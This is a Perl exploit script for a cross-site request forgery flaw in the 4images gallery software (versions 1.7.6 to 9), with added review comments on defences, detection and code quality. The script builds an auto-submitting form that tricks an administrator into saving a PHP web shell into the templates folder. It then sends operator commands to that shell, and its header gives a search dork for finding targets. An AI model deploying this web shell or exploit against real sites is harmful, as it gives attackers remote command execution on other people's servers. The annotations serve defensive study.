
4Images 1.7.6 Cross Site Request Forgery

Posted on 31 January 2012

#!/usr/bin/perl
########################################################################
# Title : 4images 1.7.6 > 9 Csrf inject php code
# Author : Or4nG.M4n
# Version : 1.7.6 > 9
# Homepage : http://www.4homepages.de/
# Dork : "Powered by 4images"
# video : http://youtu.be/NYF_zC9hH54
# Thnks~#+----------------------------------+
# | xSs m4n i-Hmx h311c0d3 |.sp. abo.B4sil
# | HcJ Cyb3r ahwak20o0 sa^Dev!L |.sp. r00ts3c
# +----------------------------------+
# 4images 1.7.6 > 9 Csrf inject php code
# vuln : template.php
#
# NOTE(review): what this proof of concept shows
#   The script writes an HTML page (csrf.htm) holding a form that submits
#   itself to <site>/admin/templates.php with action=savetemplate. When the
#   browser of a logged-in administrator loads that page, the POST travels
#   with the administrator's session and asks the template editor to store
#   the posted text as templates/default/inject.php. The advisory title
#   classes this as CSRF, so the save request is presumably accepted
#   without a per-session anti-forgery token -- confirm against the
#   application source. The second half of the script then requests the
#   stored file over HTTP.
#
# NOTE(review): defensive takeaways
#   * Require and verify an unpredictable anti-CSRF token on every
#     state-changing admin request; set SameSite on the session cookie.
#   * A template editor that can create a file with a .php extension under
#     the web root turns a forged admin request into server-side code
#     execution. Restrict the file names and extensions the editor will
#     write, and disable script execution in the templates directory where
#     the deployment allows it.
#   * Detection: POSTs to /admin/templates.php with action=savetemplate
#     whose Origin/Referer is not the site itself; new or unexpected .php
#     files under templates/ (this PoC uses templates/default/inject.php);
#     GET requests to files under templates/ that carry a "cmd" query
#     parameter.
#
# NOTE(review): script quality
#   There is no "use strict" / "use warnings"; every variable except
#   $content is a package global. The line structure below was restored
#   from a collapsed listing, so whitespace inside the string literals is
#   kept exactly as it appears on the page.

# LWP::Simple provides get(); LWP::UserAgent is loaded but nothing in the
# visible script uses it.
use LWP::UserAgent;
use LWP::Simple;

# "cls" is the Windows console clear command; the return value of system()
# is ignored.
system("cls");

# Banner. NOTE(review): "@hotmail" sits inside a double-quoted string, so
# Perl interpolates it as an array rather than printing it literally.
print " +----------------------------------------+ | 4images 1.7.6 > 9 csrf inject php code | | Or4nG.M4n : priv8te@hotmail.com | +----------------------------------------+ Loading ... ";
sleep(3);

# Read the base URL of the 4images installation from standard input.
# The value is used unvalidated in the form action and in the request URL.
print "http://tragt & path #";
$h = <STDIN>;
chomp $h;

# The forged request: a hidden-field form aimed at the admin template
# editor, followed by a <script> that submits it as soon as the page loads.
# Fields sent: action=savetemplate, content=<PHP text>,
# template_file_name=inject.php, template_folder=default.
# The PHP text passes the "cmd" query parameter to system() and prints a
# "__Code__" marker before and after the output.
$html = '<form action="'.$h.'/admin/templates.php" name="csrf" method="post"> <input type="hidden" name="action" value="savetemplate"> <textarea name="content" cols="0" rows="0" > <?php $cmd = $_GET["cmd"]; print " __Code__ "; @system($cmd); print " __Code__ "; ?> </textarea> <input type="hidden" name="template_file_name" value="inject.php"> <input type="hidden" name="template_folder" value="default"> <script>document.csrf.submit();</script> </form>';
sleep(2);

# Append the form to csrf.htm in the current directory.
# NOTE(review): bareword filehandle, mode embedded in the file name
# argument, and no check of open()/print/close results; '>>' appends, so a
# second run adds a second form to the same file.
print "Createing ... ";
open(XSS , '>>csrf.htm');
print XSS $html;
close(XSS);
print "Createing Done .. ";
sleep(2);

# Operator instructions, then block until a line is entered.
print "Now give csrf.htm to admin or useing iframe code ";
sleep(1);
print " if you done hit any key to continue";
$continue = <>;

# Interactive loop, at most 15 rounds: read a line, request the stored
# template file with that line as the "cmd" parameter, print the response.
for($ops=0;$ops<15;$ops++) {
    print " Command# ";
    $execut =<STDIN>;
    chomp($execut);
    # Request URL is built by plain string concatenation.
    $ex = $h."/templates/default/inject.php?cmd=".$execut;
    # LWP::Simple::get returns undef when the request fails; the result is
    # not checked before it is matched and printed.
    my $content = get $ex;
    # NOTE(review): the pattern is case-sensitive and its closing marker is
    # "__code__", while the stored PHP prints "__Code__" both times.
    while($content =~ m{__Code__(.*?)__code__(.*)}g){
        print " [+]Executing ";
    }
    # The whole response body is printed, markers included.
    print $content;
}
# The End

 
